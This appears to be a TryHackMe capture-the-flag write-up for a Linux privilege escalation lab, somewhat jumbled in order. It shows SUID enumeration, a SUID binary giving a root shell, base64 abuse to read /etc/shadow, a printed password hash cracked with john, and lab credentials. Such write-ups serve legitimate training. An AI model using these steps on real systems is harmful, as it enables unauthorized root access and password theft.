TryHackMe: Write-Up Linux PrivEsc

> find / -writable 2>/dev/null > /tmp/result
$ ls -al /home/murdoch
total 32
drwxrwxrwx 2 root root  4096 Oct 22 07:19 .
drwxr-xr-x 5 root root  4096 Jun 20  2021 ..
-rwsr-xr-x 1 root root 16712 Jun 20  2021 test
-rw-rw-r-- 1 root root    86 Jun 20  2021 thm.py
$ ./test
root@ip-10-10-xx-xx:/home/murdoch#
root@ip-10-10-xx-xx:/root# find / -name "flag6.txt" 2>/dev/null
/home/matt/flag6.txt
By now you have a fairly good understanding of the main privilege escalation vectors on Linux and this challenge should be fairly easy.
You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root.
We designed this room to help you build a thorough methodology for Linux privilege escalation that will be very useful in exams such as OSCP and your penetration testing engagements.
Leave no privilege escalation vector unexplored, privilege escalation is often more an art than a science.
You can access the target machine over your browser or use the SSH credentials below.
Username: leonard
Password: Penny123
> find / -type f -perm -04000 -ls 2>/dev/null
15  cd rootflag/
16  ls
17  cat flag2.txt
> LF='/home/rootflag/flag2.txt'
> base64 $LF | base64 --decode
> LF='/etc/shadow'
> base64 $LF | base64 --decode
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
> echo '$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/' > missy-hash-file
> john --wordlist=/usr/share/wordlists/rockyou.txt -format=sha512crypt missy-hash-file
> su - missy
> find / -name "flag1.txt" 2>/dev/null
/home/missy/Documents/flag1.txt

One9twO
